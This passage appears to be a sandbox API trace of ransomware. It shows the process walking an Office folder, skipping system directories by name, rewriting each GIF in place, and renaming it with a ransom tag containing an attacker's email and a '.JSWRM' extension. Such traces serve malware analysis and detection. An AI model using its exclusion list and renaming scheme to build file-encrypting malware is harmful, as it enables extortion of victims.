[0119.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c80) returned 0x24e1d8 [0119.806] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x4c80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x4c80, lpOverlapped=0x0) returned 1 [0119.814] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.814] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x4c80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x4c80, lpOverlapped=0x0) returned 1 [0119.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.814] CloseHandle (hObject=0x314) returned 1 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0119.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0119.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0119.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.816] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xce72, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR5F.GIF", cAlternateFileName="")) returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2=".") returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="..") returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="...") returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="windows") returned -1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="recovery") returned -1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="perflogs") returned -1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="documents and settings") returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="system volume information") returned -1 [0119.816] lstrcmpiW (lpString1="PDIR5F.GIF", lpString2="msocache") returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR5F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR5F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR5F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.818] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=52850) returned 1 [0119.818] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xce70) returned 0x24e1d8 [0119.818] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xce70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xce70, lpOverlapped=0x0) returned 1 [0119.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.822] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xce70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xce70, lpOverlapped=0x0) returned 1 [0119.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.822] CloseHandle (hObject=0x314) returned 1 [0119.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0119.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0119.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0119.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0119.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0119.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR5F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir5f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.824] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24dd, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR6B.GIF", cAlternateFileName="")) returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2=".") returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="..") returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="...") returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="windows") returned -1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="recovery") returned -1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="perflogs") returned -1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="documents and settings") returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="system volume information") returned -1 [0119.824] lstrcmpiW (lpString1="PDIR6B.GIF", lpString2="msocache") returned 1 [0119.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6B.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR6B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6B.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6B.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR6B.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0119.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0119.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.826] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9437) returned 1 [0119.826] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24d0) returned 0x24e1d8 [0119.826] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x24d0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x24d0, lpOverlapped=0x0) returned 1 [0119.828] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.828] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x24d0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x24d0, lpOverlapped=0x0) returned 1 [0119.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.829] CloseHandle (hObject=0x314) returned 1 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0119.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0119.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0119.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0119.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.829] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0119.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0119.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0119.830] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e4a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR6F.GIF", cAlternateFileName="")) returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2=".") returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="..") returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="...") returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="windows") returned -1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="recovery") returned -1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="perflogs") returned -1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="documents and settings") returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="system volume information") returned -1 [0119.830] lstrcmpiW (lpString1="PDIR6F.GIF", lpString2="msocache") returned 1 [0119.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0119.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6F.GIF", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR6F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0119.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6F.GIF", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR6F.GIF", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR6F.GIF", lpUsedDefaultChar=0x0) returned 10 [0119.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0119.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0119.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0119.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir6f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.832] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=28234) returned 1 [0119.832] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e40) returned 0x24e1d8 [0119.832] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x6e40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x6e40, lpOverlapped=0x0) returned 1 [0119.839] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.839] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x6e40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x6e40, lpOverlapped=0x0) returned 1 [0119.839] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.839] CloseHandle (hObject=0x314) returned 1 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0119.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.839] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.839] HeapFree (in: 